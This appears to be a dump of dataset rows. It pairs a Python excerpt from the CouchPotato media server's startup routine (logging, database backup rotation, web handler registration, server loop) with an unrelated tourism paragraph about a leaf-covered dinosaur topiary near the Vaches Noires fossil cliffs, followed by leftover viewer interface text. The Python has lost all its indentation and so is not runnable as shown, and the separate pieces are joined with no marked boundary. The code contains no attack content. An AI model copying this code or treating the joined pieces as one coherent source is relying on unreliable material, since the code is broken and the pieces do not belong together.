options.config_file = os.path.expanduser(options.config_file)
options.pid_file = os.path.expanduser(options.pid_file)
return options
# Tornado monkey patch logging..
def _log(status_code, request):
if status_code < 400:
return
else:
log_method = logging.debug
request_time = 1000.0 * request.request_time()
summary = request.method + " " + request.uri + " (" + \
request.remote_ip + ")"
log_method("%d %s %.2fms", status_code, summary, request_time)
def runCouchPotato(options, base_path, args, data_dir = None, log_dir = None, Env = None, desktop = None):
try:
locale.setlocale(locale.LC_ALL, "")
encoding = locale.getpreferredencoding()
except (locale.Error, IOError):
encoding = None
# for OSes that are poorly configured I'll just force UTF-8
if not encoding or encoding in ('ANSI_X3.4-1968', 'US-ASCII', 'ASCII'):
encoding = 'UTF-8'
Env.set('encoding', encoding)
# Do db stuff
db_path = sp(os.path.join(data_dir, 'database'))
old_db_path = os.path.join(data_dir, 'couchpotato.db')
# Remove database folder if both exists
if os.path.isdir(db_path) and os.path.isfile(old_db_path):
db = SuperThreadSafeDatabase(db_path)
db.open()
db.destroy()
# Check if database exists
db = SuperThreadSafeDatabase(db_path)
db_exists = db.exists()
if db_exists:
# Backup before start and cleanup old backups
backup_path = sp(os.path.join(data_dir, 'db_backup'))
backup_count = 5
existing_backups = []
if not os.path.isdir(backup_path): os.makedirs(backup_path)
for root, dirs, files in os.walk(backup_path):
# Only consider files being a direct child of the backup_path
if root == backup_path:
for backup_file in sorted(files):
ints = re.findall('\d+', backup_file)
# Delete non zip files
if len(ints) != 1:
try: os.remove(os.path.join(root, backup_file))
except: pass
else:
existing_backups.append((int(ints[0]), backup_file))
else:
# Delete stray directories.
shutil.rmtree(root)
# Remove all but the last 5
for eb in existing_backups[:-backup_count]:
os.remove(os.path.join(backup_path, eb[1]))
# Create new backup
new_backup = sp(os.path.join(backup_path, '%s.tar.gz' % int(time.time())))
zipf = tarfile.open(new_backup, 'w:gz')
for root, dirs, files in os.walk(db_path):
for zfilename in files:
zipf.add(os.path.join(root, zfilename), arcname = 'database/%s' % os.path.join(root[len(db_path) + 1:], zfilename))
zipf.close()
# Open last
db.open()
else:
db.create()
# Force creation of cachedir
log_dir = sp(log_dir)
cache_dir = sp(os.path.join(data_dir, 'cache'))
python_cache = sp(os.path.join(cache_dir, 'python'))
if not os.path.exists(cache_dir):
os.mkdir(cache_dir)
if not os.path.exists(python_cache):
os.mkdir(python_cache)
session = requests.Session()
session.max_redirects = 5
# Register environment settings
Env.set('app_dir', sp(base_path))
Env.set('data_dir', sp(data_dir))
Env.set('log_path', sp(os.path.join(log_dir, 'CouchPotato.log')))
Env.set('db', db)
Env.set('http_opener', session)
Env.set('cache_dir', cache_dir)
Env.set('cache', FileSystemCache(python_cache))
Env.set('console_log', options.console_log)
Env.set('quiet', options.quiet)
Env.set('desktop', desktop)
Env.set('daemonized', options.daemon)
Env.set('args', args)
Env.set('options', options)
# Determine debug
debug = options.debug or Env.setting('debug', default = False, type = 'bool')
Env.set('debug', debug)
# Development
development = Env.setting('development', default = False, type = 'bool')
Env.set('dev', development)
# Disable logging for some modules
for logger_name in ['enzyme', 'guessit', 'subliminal', 'apscheduler', 'tornado', 'requests']:
logging.getLogger(logger_name).setLevel(logging.ERROR)
for logger_name in ['gntp']:
logging.getLogger(logger_name).setLevel(logging.WARNING)
# Disable SSL warning
disable_warnings()
# Use reloader
reloader = debug is True and development and not Env.get('desktop') and not options.daemon
# Logger
logger = logging.getLogger()
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s', '%m-%d %H:%M:%S')
level = logging.DEBUG if debug else logging.INFO
logger.setLevel(level)
logging.addLevelName(19, 'INFO')
# To screen
if (debug or options.console_log) and not options.quiet and not options.daemon:
hdlr = logging.StreamHandler(sys.stderr)
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
# To file
hdlr2 = handlers.RotatingFileHandler(Env.get('log_path'), 'a', 500000, 10, encoding = Env.get('encoding'))
hdlr2.setFormatter(formatter)
logger.addHandler(hdlr2)
# Start logging & enable colors
# noinspection PyUnresolvedReferences
import color_logs
from couchpotato.core.logger import CPLog
log = CPLog(__name__)
log.debug('Started with options %s', options)
# Check available space
try:
total_space, available_space = getFreeSpace(data_dir)
if available_space < 100:
log.error('Shutting down as CP needs some space to work. You\'ll get corrupted data otherwise. Only %sMB left', available_space)
return
except:
log.error('Failed getting diskspace: %s', traceback.format_exc())
def customwarn(message, category, filename, lineno, file = None, line = None):
log.warning('%s %s %s line:%s', (category, message, filename, lineno))
warnings.showwarning = customwarn
# Create app
from couchpotato import WebHandler
web_base = ('/' + Env.setting('url_base').lstrip('/') + '/') if Env.setting('url_base') else '/'
Env.set('web_base', web_base)
api_key = Env.setting('api_key')
if not api_key:
api_key = uuid4().hex
Env.setting('api_key', value = api_key)
api_base = r'%sapi/%s/' % (web_base, api_key)
Env.set('api_base', api_base)
# Basic config
host = Env.setting('host', default = '0.0.0.0')
host6 = Env.setting('host6', default = '::')
config = {
'use_reloader': reloader,
'port': tryInt(Env.setting('port', default = 5050)),
'host': host if host and len(host) > 0 else '0.0.0.0',
'host6': host6 if host6 and len(host6) > 0 else '::',
'ssl_cert': Env.setting('ssl_cert', default = None),
'ssl_key': Env.setting('ssl_key', default = None),
}
# Load the app
application = Application(
[],
log_function = lambda x: None,
debug = config['use_reloader'],
gzip = True,
cookie_secret = api_key,
login_url = '%slogin/' % web_base,
)
Env.set('app', application)
# Request handlers
application.add_handlers(".*$", [
(r'%snonblock/(.*)(/?)' % api_base, NonBlockHandler),
# API handlers
(r'%s(.*)(/?)' % api_base, ApiHandler), # Main API handler
(r'%sgetkey(/?)' % web_base, KeyHandler), # Get API key
(r'%s' % api_base, RedirectHandler, {"url": web_base + 'docs/'}), # API docs
# Login handlers
(r'%slogin(/?)' % web_base, LoginHandler),
(r'%slogout(/?)' % web_base, LogoutHandler),
# Catch all webhandlers
(r'%s(.*)(/?)' % web_base, WebHandler),
(r'(.*)', WebHandler),
])
# Static paths
static_path = '%sstatic/' % web_base
for dir_name in ['fonts', 'images', 'scripts', 'style']:
application.add_handlers(".*$", [
('%s%s/(.*)' % (static_path, dir_name), StaticFileHandler, {'path': sp(os.path.join(base_path, 'couchpotato', 'static', dir_name))})
])
Env.set('static_path', static_path)
# Load configs & plugins
loader = Env.get('loader')
loader.preload(root = sp(base_path))
loader.run()
# Fill database with needed stuff
fireEvent('database.setup')
if not db_exists:
fireEvent('app.initialize', in_order = True)
fireEvent('app.migrate')
# Go go go!
from tornado.ioloop import IOLoop
from tornado.autoreload import add_reload_hook
loop = IOLoop.current()
# Reload hook
def reload_hook():
fireEvent('app.shutdown')
add_reload_hook(reload_hook)
# Some logging and fire load event
try: log.info('Starting server on port %(port)s', config)
except: pass
fireEventAsync('app.load')
ssl_options = None
if config['ssl_cert'] and config['ssl_key']:
ssl_options = {
'certfile': config['ssl_cert'],
'keyfile': config['ssl_key'],
}
server = HTTPServer(application, no_keep_alive = True, ssl_options = ssl_options)
try_restart = True
restart_tries = 5
while try_restart:
try:
server.listen(config['port'], config['host'])
if Env.setting('ipv6', default = False):
try: server.listen(config['port'], config['host6'])
except: log.info2('Tried to bind to IPV6 but failed')
loop.start()
server.close_all_connections()
server.stop()
loop.close(all_fds = True)
except Exception as e:
log.error('Failed starting: %s', traceback.format_exc())
try:
nr, msg = e
if nr == 48:
log.info('Port (%s) needed for CouchPotato is already in use, try %s more time after few seconds', (config.get('port'), restart_tries))
time.sleep(1)
restart_tries -= 1
if restart_tries > 0:
continue
else:
return
except ValueError:
return
except:
pass
raise
try_restart = False
|
The emblem situated between Villers and Houlgate, the Vaches Noires cliffs, is a scientifically renowned palaeontological site.
Among other things, you can find the fossils of a 10-m-long pliosaur, a ichthyosaur, a sea “crocodile”, but also ammonites, sea urchins and sponges. To make this exclusive heritage popular, a giant dinosaur made of leaves has been placed at the heart of the city in the gardens situated in front of the Tourism Office. Throughout the years, it has become the real emblem of this resort. The dinosaur, 12-m long and 7-m high, is made of an iron frame filled with 6 tons of dirt where about 9,000 plants grow.
It has been created in June - so that these plants may grow enough - by the green area service of the city, that will remove it in November. Its coming back is an opportunity to organize a much-anticipated annual event announcing the beginning of summer!
Please note that recently this dinosaur has been accompanied by his son. Effective landmark in the area, it is admired by visitors that have transformed it into the main target of their souvenir photos.
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.